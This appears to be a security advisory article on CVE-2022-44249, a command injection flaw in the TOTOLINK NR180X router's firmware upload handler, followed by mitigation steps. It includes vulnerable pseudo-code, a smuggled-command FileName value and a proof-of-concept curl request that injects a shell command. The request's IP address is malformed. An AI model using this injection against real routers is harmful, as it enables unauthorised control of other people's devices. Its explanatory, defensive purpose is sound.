CVE-2022-44249 - Command Injection in TOTOLINK NR180X V9.1.u.6279_B20210910 via UploadFirmwareFile

---

The TOTOLINK NR180X is a popular WiFi-6 router, but in late 2022, security researchers discovered a critical vulnerability—CVE-2022-44249—that puts users at risk of remote code execution by unauthenticated attackers. This article breaks down the nature of the vulnerability, the simple but powerful attack method, includes proof-of-concept code, and offers mitigation advice. All in clear, simple language.

What Is CVE-2022-44249?

CVE-2022-44249 is a command injection vulnerability affecting the TOTOLINK NR180X running firmware version V9.1.u.6279_B20210910. The flaw lives in the router’s web management interface—for updating its firmware. Specifically, the bug is in the UploadFirmwareFile function and how it handles the FileName parameter.

What’s the Big Deal?

- Anyone who can reach the router’s web interface, even over the local network, can exploit this bug.

How Does the Vulnerability Work?

When a user uploads new firmware via the web GUI, the NR180X backend calls UploadFirmwareFile, passing along whatever FileName value the user provides. The problem: this value ends up in a system command without proper sanitization.

Here is a pseudo-code example to illustrate

// Example pseudo-code
void UploadFirmwareFile(char* FileName, ...) {
    char cmd[256];
    // Vulnerable: FileName is copied directly (no checks!)
    sprintf(cmd, "cp /tmp/upload/%s /tmp/fwupload/", FileName);
    system(cmd); // Command injection risk!
}

If an attacker sends a FileName like firmware.bin;uname -a;, the command effectively becomes

cp /tmp/upload/firmware.bin;uname -a; /tmp/fwupload/

The router executes both cp ... and uname -a! An attacker could inject any Linux command.

Here’s how an attacker could exploit this via curl (or a simple POST request)

curl -X POST \
     -F "FileName=firmware.bin;echo 'hacked' > /tmp/pwned;" \
     -F "FirmwareFile=@dummy_firmware.bin" \
     http://192.168..1/cgi-bin/UploadFirmwareFile

- This would create a file /tmp/pwned with the contents “hacked” on the router, proof the exploit worked.

More malicious payloads can easily open a reverse shell, change router DNS settings, or brick the device.

Real-World Impact

- Network Takeover: The attacker can set up backdoors, sniff traffic, or redirect DNS for phishing.

How to Mitigate

1. Upgrade your firmware: TOTOLINK has released patches—always download the latest here for your model.
2. Restrict Web Interface: Only permit web access from trusted devices; disable WAN-side admin access.

References and Learn More

- Official CVE entry for CVE-2022-44249
- TOTOLINK Official Download Page
- Exploit details - Seebug advisory (Chinese)
- Vulmon Security Center

Closing

CVE-2022-44249 is a perfect storm of “Easy to exploit” and “Total control”—it’s a textbook case proving why router firmware must never trust user input. If you own a TOTOLINK NR180X, take action now: update and secure your network. For security professionals, this is another reminder to always audit embedded system web interfaces for bad parameter handling—before the bad actors do!

*(Stay safe! If you have neighbors with TOTOLINK gear, send them this link—it’s an easy fix to a major problem.)*

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:41:00 UTC